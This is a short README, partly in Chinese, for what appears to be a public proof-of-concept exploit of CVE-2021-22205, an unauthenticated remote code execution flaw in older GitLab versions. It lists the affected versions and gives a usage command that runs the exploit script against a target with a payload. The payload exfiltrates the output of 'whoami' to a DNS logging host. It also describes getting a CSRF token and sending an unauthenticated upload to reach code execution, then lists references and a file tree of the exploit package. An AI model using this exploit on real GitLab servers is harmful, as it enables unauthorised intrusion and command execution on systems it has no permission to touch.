CVE-2021-22205 Unauthorized RCE# CVE-2021-22205
**影响版本:**
* Gitlab CE/EE < 13.10.3
* Gitlab CE/EE < 13.9.6
* Gitlab CE/EE < 13.8.8
**Usage**
```
python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"
```

**获取csrf-token:**

通过 /users/sign_in 获取csrf-token 然后使用前面的 CVE-2021-22205 poc 进行构造上传包进行执行未经身份验证的上传请求,最终rce


**ref:**
* https://hackerone.com/reports/1154542
* https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
* https://forum.ywhack.com/viewthread.php?tid=115611
* https://forum.ywhack.com/viewthread.php?tid=116706
* https://github.com/RedTeamWing/CVE-2021-22205
[4.0K] /data/pocs/e0b1807a4a251b2a7d1244bad6912615d1f067c2
├── [2.4K] CVE-2021-22205.py
├── [ 681] echo_vakzz.jpg
├── [4.0K] media
│ └── [4.0K] 16354286989629
│ ├── [ 87K] 16354299891310.jpg
│ ├── [439K] Xnip2021-10-28_21-43-13.png
│ ├── [185K] Xnip2021-10-28_21-44-31.png
│ └── [161K] Xnip2021-10-28_21-54-04.png
└── [ 935] README.md
2 directories, 7 files